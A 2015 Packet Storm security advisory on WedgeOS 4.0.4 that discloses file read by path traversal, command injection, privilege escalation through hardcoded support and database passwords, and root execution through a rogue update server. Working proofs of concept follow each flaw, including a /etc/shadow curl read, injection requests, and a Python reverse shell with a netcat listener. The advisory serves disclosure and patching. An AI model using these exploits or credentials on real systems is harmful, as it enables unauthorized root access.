WedgeOS 4.0.4 Arbitrary File Read / Command Execution

2015-06-30T00:00:00
ID PACKETSTORM:132497
Type packetstorm
Reporter Daniel Jensen
Modified 2015-06-30T00:00:00

Description

                                        
                                            `( , ) (,  
. '.' ) ('. ',  
). , ('. ( ) (  
(_,) .'), ) _ _,  
/ _____/ / _ \ ____ ____ _____  
\____ \==/ /_\ \ _/ ___\/ _ \ / \  
/ \/ | \\ \__( <_> ) Y Y \  
/______ /\___|__ / \___ >____/|__|_| /  
\/ \/.-. \/ \/:wq  
(x.0)  
'=.|w|.='  
_=''"''=.  
  
presents..  
  
WedgeOS Multiple Vulnerabilities  
Affected versions: WedgeOS <= 4.0.4  
  
PDF:  
http://www.security-assessment.com/files/documents/advisory/WedgeOS-Final.pdf  
  
+-----------+  
|Description|  
+-----------+  
Wedge Networks WedgeOS Virtual Appliance contains a number of security  
vulnerabilities, including unauthenticated arbitrary file read as root,  
command injection in the web interface, privilege escalation to root,  
and command execution via the system update functionality.  
  
+------------+  
|Exploitation|  
+------------+  
==Unauthenticated Arbitrary File Read==  
Any user with access to the web interface of WedgeOS may submit a GET  
request to the ssgimages function, using directory traversal to specify  
an arbitrary file on disk. The web server runs as root, so any file may  
be read, including the shadow file. This vulnerability can be used to  
read the contents of the local MySQL database, which contains MD5  
password hashes for the web interface.  
[POC]  
curl -sk  
'https://[HOST]/ssgmanager/ssgimages?name=../../../../../etc/shadow' |  
head -n 1  
root:$1$KVY2OJDj$Xg5LkGQI3lUvzr8GVIErp/:15828:0:99999:7:::  
  
==Command Injection==  
Any authenticated user may execute arbitrary commands as root. The ping,  
nslookup, and traceroute functions of the diagnostic interface fail to  
validate user input correctly, which allows the injection of arbitrary  
system commands. Bash brace expansion can be used to execute more  
syntactically complex commands.  
[POC]  
----  
POST /ssgmanager/jsp/readaccess/ping.jsf HTTP/1.1  
Host: [HOST]  
Cookie: JSESSIONID=[SESSION];  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 123  
  
mainform=mainform&mainform:input=1%26id&mainform:submitGo=Go&mainform:j_id_jsp_208968386_10pc4=&javax.faces.ViewState=j_id3  
----  
  
==Privilege Escalation==  
A remote user with access to the 'support' account over SSH can escalate  
privileges to root by using way of the admin account. The support  
account can be accessed with the password "ous35hi3". This gives the  
user a bash shell. If the support user knows the password for the admin  
user, they can switch to the admin user and launch a bash shell.  
Otherwise, the admin password can be reset by logging in with the  
resetpassword user, or by accessing the local MySQL database and  
cracking the admin hash. The database can be accessed with the "root"  
user and password "wecandoit".  
  
Once the user has the admin password, they can switch to the admin user  
and spawn a bash shell by executing the following command:  
su -s /bin/bash admin  
  
With a bash shell as the admin user, there are multiple methods to  
escalate to root. If the file at /var/tmp/secfi_update.sh does not  
exist, this can be created and executed as root with sudo. However this  
file is created when updating the system, so it may not be possible.  
The admin user can also escalate privileges to root by creating a  
specific directory path in any location where they have write access,  
and exploiting environment variables when running the ctl_snort.sh  
script via sudo.  
  
[POC]  
-Read admin password from DB-  
ssh support@[HOST]  
support@[HOST]'s password: [ous35hi3]  
[support@wedgevm ~]$ mysql -u root --password=wecandoit ssgmanager -e  
'select password from admin;'  
+----------------------------------+  
| password |  
+----------------------------------+  
| [PASSWORD] |  
+----------------------------------+  
  
-Reset admin password with support user-  
ssh resetpassword@[HOST]  
resetpassword@[HOST]'s password: [default!]  
Reset password for admin (y/n)? y  
Resetting admin password...  
Admin password has been reset to default.  
Connection to [HOST] closed.  
  
-Privesc via environment variables and sudo-  
[support@wedgevm ~]$ su -s /bin/bash admin  
Password: [admin] (Default password)  
[admin@wedgevm support]$ export GUARDIAN_HOME=/var/tmp  
[admin@wedgevm support]$ mkdir -p /var/tmp/shared/script  
[admin@wedgevm support]$ echo "id > /var/tmp/id" >  
/var/tmp/shared/script/query_license.sh  
[admin@wedgevm support]$ chmod +x /var/tmp/shared/script/query_license.sh  
[admin@wedgevm support]$ sudo /usr/local/snort/bin/ctl_snort.sh start  
-mode ids  
Error: specify the snort configuration file with -config  
[admin@wedgevm support]$ cat /var/tmp/id  
uid=0(root) gid=0(root)  
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
[admin@wedgevm support]$  
  
  
==Command Execution==  
An admin user with write access to the web interface may execute  
arbitrary commands as root. The user can specify an external server with  
which to retrieve system updates. The WedgeOS requests a shell script  
from the remote host and runs it as root. No validation of the script is  
performed, so arbitrary commands may be specified.  
  
[POC]  
-Reverse Shell-  
$cat secfi_update1.2.3.4.sh  
python -c 'import  
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST]",1337));  
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);  
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  
  
-HTTP Post-  
POST /ssgmanager/jsp/writeaccess/SystemUpdate.jsf HTTP/1.1  
Host: [HOST]  
Cookie: JSESSIONID=[SESSION]; JSESSIONIDSSO=[SESSION]  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 233  
  
mainform=mainform&mainform%3Aid=1&mainform%3Apassword=1&mainform%3Aupdates=&mainform%3Aversion=1.2.3.4  
&mainform%3AisDefaultServer=false&mainform%3AcustomServer=[HOST]%2F&mainform%3Asave=Run+Update&javax.faces.ViewState=j_id12  
  
-HTTP Server and Listener-  
$python -m SimpleHTTPServer 80 & netcat -vnlp 1337  
[1] 24289  
listening on [any] 1337 ...  
Serving HTTP on 0.0.0.0 port 80 ...  
[HOST] - - [18/Jun/2015 11:50:09] "GET /secfi_update1.2.3.4.sh HTTP/1.0"  
200 -  
connect to [HOST] from (UNKNOWN) [HOST] 53933  
sh: no job control in this shell  
sh-4.0# id  
id  
uid=0(root) gid=0(root)  
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
  
+----------+  
| Solution |  
+----------+  
Update to WedgeOS version 4.0.5-482 or greater.  
  
+-------------------+  
|Disclosure Timeline|  
+-------------------+  
16/03/2015 - Advisory sent to vendor.  
20/03/2015 - Follow up email checking if vendor has received.  
24/03/2015 - Advisory receipt acknowledged by vendor.  
22/04/2015 - Email sent asking for update, email undeliverable due to  
421 Timeout from vendor mail server.  
28/04/2015 - Additional email sent asking for update.  
28/04/2015 - Vendor response, states official response will be provided  
shortly.  
15/05/2015 - Email sent asking for update on official response, email  
undeliverable.  
20/05/2015 - Additional email sent asking for update on official  
response, email undeliverable.  
27/05/2015 - Called vendor, who stated a new release is being worked on  
and an update will be provided soon.  
03/06/2015 - Email from vendor stating a new version is being put together.  
09/06/2015 - Email sent to vendor stating the advisory will be publicly  
disclosed soon, email undeliverable.  
12/06/2015 - Called vendor, who stated a new version will be released  
shortly.  
12/06/2015 - Email from vendor confirming imminent release of new version.  
12/06/2015 - Vendor advises a fix is in place in the newly released  
update of WedgeOS.  
29/06/2015 - Advisory Release.  
  
+-----------------------------+  
|About Security-Assessment.com|  
+-----------------------------+  
  
Security-Assessment.com is Australasia's leading team of Information  
Security consultants specialising in providing high quality Information  
Security services to clients throughout the Asia Pacific region. Our  
clients include some of the largest globally recognised companies in  
areas such as finance, telecommunications, broadcasting, legal and  
government. Our aim is to provide the very best independent advice and a  
high level of technical expertise while creating long and lasting  
professional relationships with our clients.  
  
Security-Assessment.com is committed to security research and  
development, and its team continues to identify and responsibly publish  
vulnerabilities in public and private software vendor's products.  
Members of the Security-Assessment.com R&D team are globally recognised  
through their release of whitepapers and presentations related to new  
security research.  
  
For further information on this issue or any of our service offerings,  
contact us:  
Web www.security-assessment.com  
Email info () security-assessment.com  
Phone +64 4 470 1650  
  
  
  
`